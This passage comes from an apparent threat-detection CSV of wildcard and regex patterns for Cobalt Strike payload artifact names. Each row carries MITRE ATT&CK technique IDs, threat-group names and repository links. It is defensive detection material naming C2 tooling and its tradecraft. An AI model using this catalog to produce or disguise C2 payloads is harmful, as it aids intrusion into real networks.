an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifact_stager*",".{0,1000}artifact_stager.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - 
APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*artifact_stager*",".{0,1000}artifact_stager.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifact32*.exe*",".{0,1000}artifact32.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifact32.dll*",".{0,1000}artifact32\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifact32.dll*",".{0,1000}artifact32\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifact32.exe*",".{0,1000}artifact32\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" 
"*artifact32.exe*",".{0,1000}artifact32\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifact32big.dll*",".{0,1000}artifact32big\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifact32big.exe*",".{0,1000}artifact32big\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifact32svc.exe*",".{0,1000}artifact32svc\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifact32svcbig.exe*",".{0,1000}artifact32svcbig\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifact64*.exe*",".{0,1000}artifact64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 
- T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifact64.dll*",".{0,1000}artifact64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifact64.exe*",".{0,1000}artifact64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' 
between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifact64.x64.dll*",".{0,1000}artifact64\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifact64big.exe*",".{0,1000}artifact64big\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifact64big.x64.dll*",".{0,1000}artifact64big\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifact64svc.exe*",".{0,1000}artifact64svc\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifact64svcbig.exe*",".{0,1000}artifact64svcbig\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifactbig64.exe*",".{0,1000}artifactbig64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. 
